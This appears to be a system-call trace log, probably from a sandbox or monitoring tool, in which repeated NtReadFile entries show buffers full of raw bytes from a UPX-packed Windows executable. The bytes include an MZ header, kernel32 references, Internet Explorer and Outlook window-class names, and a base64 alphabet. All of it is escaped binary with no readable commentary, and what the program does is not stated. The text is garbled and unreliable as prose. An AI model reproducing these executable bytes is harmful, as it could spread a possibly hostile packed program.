\x00\x00\x00\x00\x00\x81\x95\xde0+[\xff\xe3\xc0p\x00\x00\xc0p\x00\x00\x19\x00\x00\x00premium-server@thawte.comMZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001.24\x00UPX!\x0c \x02 \x19\xfb\x87H\x91\xa6q\xb5\x12\xc6\x00\x00\xfb\\x00\x00\x00\x9e\x00\x00&\x01\x00w\xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => \xfc%4\xcd \xcd\x19\xf4\xec\x14\xe47\xc8 \x83\xdc\xd0\xc4'M\xd34M
\xbc\x00\xb82\xb4
2\xc8 \xb0\xac\xa8\x02\xd2t\x83\x07\xa47\x05\xa0\xa4\xe9\x06\xfb |\x07PO7,{\xb3\x9f\x19\x08\xdf\xe8$\xa7/\x8f\x90\xc1\xce\xf2\xd8$\x0c\x07\xc8\xcf\x9e\x1dd\xc0\xb8$g\xb4$o\xac$ '\xdf%
\x1f%|<{\xf2\xecL$\xf7h P\x1do\xd8\x19\xc1V\x89e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => {\xb1c\x0c\x8d \x1b\xd2}\xa9\xb5\x01\xa1m\xef\xdd3$i\x9fA7s\xc4C\x152\xc6\zpT?+\x19h\xb8\xc3pi\x04sZ\xd9x^'0;}7Z \xb3z\x1bt\xc3\xa1q</>G#\x1c\x0eL\xedwi(t\x0e.\x8d\x00\x05@$F|OZ)\x02
Gf\xe8\x80\xc0\x9a\xdb^\xc2F/\xd8 \xc9-a\xf8N\x15\x90\xe5\x95o\x19\xe2\xb0\x81\xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => Fh,\x03g%\xf4\xff\x0f+
\x02\x00ABCDEFGHIJKLMc\xe3/\xbd\xc0PQRSUVWXYZ4c\x02.,\xb0qfg\xc4j\xa5mBpq\xff\xa5n
\x9b\xb9vwkz0123456\x86\x1e\x04\xf8789+/\xc7X-Pf\xa9\x956n\x02ty 3o\x0e\xd3\xefc\xc0^\xc9\x15N1l\x1a0#\x1ex\x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => \x8d\xef7\xf7h\x88\x10\x17\xd63\xff\x80\xbd\x0f\x00t\xff\xff\xffn\x8a\x8c=
\x80 \x8a\x01<a}\x11<z~
\x8b\xc7j\x1a\x99[\xf7v#\xf6\xf6\xfb\x80\xc2A1G\x80\xbc!\xe3\xd4[F\x0eanvP\x06H\x0fj\x01\xb4\xd9\xdc\xd6\x8e}Xw\x05T-\xb70\xd6v\x1d\x02\xf7\xec^@\xcc\xc1,\x17\xcam\xc1J\xc2W0\xd4\xfd\xc6h\x04\xb9]6t\xcbP\xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => \xd5\xc1^5\xeb\xbf\xdb\xce\xfe\x07:L$\x08t\x07\x16\xf3\x05*\x0e\xf6\xd9\x1b\xc9\xf7\xd1\xf8\xc0\xc2\xc3#\xc1\xbdQ\x00\x10\xect1\xed7\xf0\xd9,\xfc]\x0c\xbf\xffM\x10\x0f\xb68\x02\xd7\xad\xb1\x81\x03FW\x89\xa8\x05YC\xdaR\xfb\xfdBY]\xfc;\xc1u
3u\xd8c\x92l\xdf\xe9-\x06@\xeb\xf6+\x14\x04x]\x83\xe6n\xb0M\x00U\x0cC\x93\xb7\xb6}{c\x84\xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => v5;C}0\xffo\xf0\xf6\xb8a\x040\xd5P\x05\xeb\x0eH@}\x06oc{\x89\x8d\x88\x01\xeb\x06\x0f\x06\x00\xfc8H\xdf\x1ap1\x949\x0c|\xcb\x8b\xc6bu\xbc[7QY\xf8\xae'\x00`\xf4;\xb6\xd4\xd0\xbeH}k\x81\xfe\xb9\xe1_\xc5\x03U\xf6v+\xfc\x11\x85\xd2tJ\xc8O\x17@ ~\x0b\x8a\x136\xf8\xd2\xff\x88\x0c>F@Ju\xf5\xc6\xc3.F\xeb'\x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => \x07\xc5\x0fQ\xd1\x00\xafe_M\xf8\xc8\x86\xf8\xd2\x0cY\x7f\xcfB\xbc\xb2\x1d\xa3\xbe\x00@1\xea\xda"\xd8\xd3\xad\xce\xf4\x04Q-\xbc\xa7\x11\xd2\xd7O\x86+N!w\xff\xd1h\x05Du\xeba\x8dw\x04\xd1Xj5\xeb\xa4BW:\xe4\xc2\x92V\x8ew\xb6\x9d\xae\xe6\x80\x11
\xe8\x93\x15\xa3\xdc\xd6xdL\x11(\x8b@}I\x00\x1b\xd6\xd0\x05\x07\xa3q\x15\xb5\x8dB\x03\x18\xf8\x81\x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => \xb9\x13
\xdf\xf8\xf6\x8f\x02[\xe9\x03Hy\xf0\x1f~\x0f\x03\xc7\xda@\xa3v+\x12\xbe\xc8u\xc8\xd6\xc5\xee\xb1T\xbd\x8b\xc7?4E\x12\xb2
\xc1Q$85
\xa6\xc20\x13\xbc\x02$\x0eU\x1fw\x016\xd1='\x7f\x12
\x8d\x8d\xb5\xa5`\xe0\xbe2\xcb\xd5(\xe2\xc1\xa2nG\xec\x8c\xb3\x82\x18b\xf0\x93\x86V
\x1e\xdc-\x8bv\x06\x0b\x87Phn\x1c6\xd7\x86\x83Z\xc8\xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,829 | 364 | NtReadFile |
Buffer => 0\x174\xf8\xc9\x8e[\xc0w\xfc\xd4$:I\xff7\x8b\xf4V\x08\xd7\xaa\-\x19\x04\x03\xc6\xae\xc4\xee\x18\x99\x8b\x07\x1e;\xd8Oq\xdb\x92\x83o\x13+U\xfc\x03VK\x03I+%\xda\xfe\xae\xd6\xca \x8a\x19\x88\x18@A{\xf7G2]`k+[\x01\xf2\x8b_\x04\x97\xa2\xd19Otu\xaf\x99\x0f\x8eT\xfav\x88tv|M\x0cP\x80~,\xd4hc\xe4\xb4H\xec\xfaL3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => d\xfa\x19},
\x1b\xca[\xef\xe2\xfdG\xc1\xe1\x14\xa1
8 \xc1\xe0\x14\xedsH,\xfc
\x159N w3\xeb\x0b\xaf\x08|\x99(\x9dmK\x88\xc6t\xb5:u\xaa{c\x1d\x9f\x10h\x98\xbc\x0e\x02u \x8f_\xa0\x12cp\xea\\x9eeWN\xd8\\xb0\x8b\xef;\xfe\xa9>\x12s\xc0\x0c\xe5\xdcNY95\xe5)\xb8\x83\x96\x8b\x1d\x84\x86\xe4\xa3\xdf\xb3\x85Wp\xd3 \x8d\xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => \xd0\xa5\xf89N\xb60\xb3\xc0\xc0#+\x18L\xd5\xb2\xe8|-2<\xcf\x86\xcb\xc2\x1d\x88\x01\x02\x12\x8c\x14\xac
s\x01l\x08\xaeS\x99\xee\xb2\xb5\xc6fE5\xd8\x05\x06/\xa1\xed6\x82\xdc\xa9.\x07\xde+X]N\xb6\xe7\xb3\xe0\x01\xe2\x01\xeck\xe4\xd8\x88\xd1\x9b\x15\x92\xa8\x04!\x88<gt?*\xc6^\xa7,8\xc5:3M\x01@\xaf\x9ae\x88P\xbcGE\x89K\xc5\x12c\xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => \xc0\x86\x1d8'E@\x99\xb9[q\x82\x0c\xec\x1e\xad\x16\xe8d0\x03\xf8hp\xff\xb33\x84\xddTu\xed{\x04\x1b\xb1o\xcb\x07\xcc+\x19\x02\x0fh4'&lp\xe0k.v#_\xde"\x06\xfb\x19\xac\x15(
h$\x0e 8!\xd8\xc0\x94\x08\xfcP\x07;\xd0K\x84G\xe2\x82\x10\x0f\x85\xc2\x84\x19\x8f \xd7\x84/C8\xacWb2T\xa6\x0cG`\x98Q\xfe\\x91\xde\x11l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => L\x87_\xd3\xac\x14V_o\xa7
U-\x0c\xaa(\xff\xb7Uh\xbbV\xaa\xb1\xa0\x16\xd5\x95\x1b\xc0\x81\xc7\x11\xb0\x07\x1a\x88l\x90\x16\x9a\x8d\xed&G\x1ch\x88\x15\xd7\x18C\xb3\x06\xc9\xa0\xf2\x16|\xb6-\xacD\x103O_'\x1b\xf7\x80\x8e"\x9aYO\xed\xfcm\xba(\xe5x\x8b\xb8\xdbh\xf0)5U\xb3\x03\x92\xb1Y\xd3\xa2\xb7\xbd\xcd$W\x05\xf2\xb8\x98\x1dA\xb3\xef\xbdj\x1aTW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => \x040u\xf8\xc3ya\xcd\x02o\x80\xbexY;\xc6YZ\x97=\xddl\xab\x13\xcfH\x8c\xe3f\xbf\x05\xebv\xdf N1\x88\xbch|\x04W7\xdbl\xf3\xcd\xc44|\x07=+~/+&xy\xb6\x91<lZ<+\xc1E\x93\xf0\x8f1>\xbb\xd5\x1a`\xcd\xb7\x81\x0ed6TS4n\xadNs\x07\xbf\x8d6\xfa\x00\x92\xe7;D11L<\xb2\xcf\x9c=\xd5\x00,\xcd%4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => \x80\x0b\xfa^V[\xfc\xa8\xc0-Q\x0b\xd7\xb8\x82\x81b-r\x10\x0e\x17"Q\xa1U\xddf:'Sf\x16J
\x03%dL\x1f\xc3\xf0\xb2\xa0\x93h\xe0'j 'H\xd6\x05c\x00]~\xdc\xa2\xbf\x00\xb0\xd2_\x8b\xcf\xf7\xf1\xb8s\x11=
\x0fK\x00,\xb8\xe0Z\x84z\xda\xfc\xb7\x9c#<Y!\x05s\x07h\x80\xeb\xdc]\x13\xde\xac\8\xaePs\x0bX\x84\xbb\x0b9ht,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => \xbc\xcf\x028\xe7`I\xf5\x08#d_\xb7\x01\xf2\x01\x81\x10\x1b\x1fg\xff\xff\xff\xcf\xeb\x86\xf7\xa8\x1cQn\x97\x12U\x05C\xc0\xa7\xe0\x99\x89\xba\x92\xa6\xa7\x8c\xa0`\x97Fv\xff\xff_\xfe\x82\xc6L\x94\xb5\xacU\xb7\xbe\x1b\x04D\xa8\xa2\xe8\xb9\xe2\xae\xbd\x98C\xc6\xcb
k\xcc\x03\xff\xff\xc3\xffx\xbb\xbe\xc0\xb70\xc6c \xdcN,My\xa4\xbc\x05\xab\xff\xe5\xe8\x8e\x9f
!
\xff\x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => P\xca4\xb9xE\xd75D\x03\xff\xff\xff\xff\x97?\xaa/\x0e=\xb2Bt`\xb5\xc4\x93=LVj\xc4\xac\x82\xbe5\xb0Ez5\x90E7`\x04Z\xff\xff\xff\xff\xd7\x8b\x18L1\xd2l
?IMNG\x12\x97\xff\xf8\x17\xf1+\x18CzF=\xd8G\x7f\xb9.\xf5\xb6\xfd\xff\xff\xff\x81=W,&\x8e\xb9\xc8E\xd8\x02\xc2\xbaQ,\xe5\x1c\x1a\xf4*\xad\xd1\xb5A\x93\xa8~\x99\x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => \xb4\xc2\xa9B\x10)]y\xc0x\xa9\xf4\xff\xbf\xe0\xa3\xf7l\xfd\x9d\xfc\xe9\xc2\xbf\x01zGI?B\xff\xff\xff\x97Mw\xf9\x9c\xe3\xc5e\xbe\x05B\xc2\xb8\xe1OK-\xfe\x9dU\x11<\x11\x1fz\xb1?/\xff\x1b\xfc\xff\xb1\x92%^?v\xfa?d\x18K\xd2]T\xeaV\xae\xbb>
<@\x07\x04\xbf\xd1\xff\xffz\xaf=\x9a\x02\xedF)\x85Hl\x1c\x9f\x9d\x1e_\xc3|\xb70P\x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => C\xe0\xc2\xdb\xff\xff\xff\xe0\x84M\xff\xb2\xeb\x1e\x1a\x80\x1c\xe4\xf4\x9d\xbe\x18\xa5\xc2?MA4\xb3\x86\x07M\x03\x94\x9a\x12_\xfa\xffS\xecw!\xa7!S\x82
>Bo{\xac\x8e\x82\x12\x0b8\x14*\xf4\xff\xab\x0f1\x84\xf7\xbc\\xd1\x06z\xb8$g\xff\x17\xfa[\xf8\x1f\x8eIB\x07\x82\xec\xd1\x15`7:1\xc8\xe24D\xff\xff\xff\xff\x95y\x07Ib\x8b\xd4\x9b\xa9j\x89
\x82\xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => \xdd\x95\x12\xf6\x94\xae\xea\xeaQ\xdc<\xbd7[TT\x19\x17F\xff\xff\xff\xff\x936Tp\xcd\xd6\xe1
\xef\xaa\xea\x12&\x181\xfd#\xcc\xb6U\x88\x00E\x17w\xfc5H\x11\x10nU\xd5\xff\x1b\xfcDYl\x83Y\xa7\xa9\xdb1\xb0%'\xcd&\x85\xd1\x16\xe17(\xf0\xbf\xbf\xed\xd1\xbc\xfcQ\xcd\x17\xe9\x83\xc6\xad\xcb@\xbf\xf0\xff\xff\xc5\x9d\x9f\x11\x8b\x00\xa9\x84\xc9@3\xabD2Zy)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
